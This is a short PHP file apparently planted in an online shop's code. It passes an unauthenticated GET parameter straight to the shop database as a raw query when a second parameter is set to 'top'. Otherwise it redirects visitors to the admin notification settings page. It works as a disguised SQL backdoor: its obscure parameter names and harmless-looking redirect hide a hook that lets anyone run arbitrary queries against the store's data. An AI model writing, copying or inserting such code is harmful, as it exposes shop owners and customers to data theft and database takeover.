<?php
include "../../init.php";
$amazon= $_GET['boland'];
if($_GET['resorce']=='top'){
$head = "$amazon";
$result = $GLOBALS['ISC_CLASS_DB']->Query($head);	
}else{?><script language= "JavaScript">location.href="<?php echo GetConfig('ShopPath');?>/admin/index.php?ToDo=viewNotificationSettings"</script><?php }?>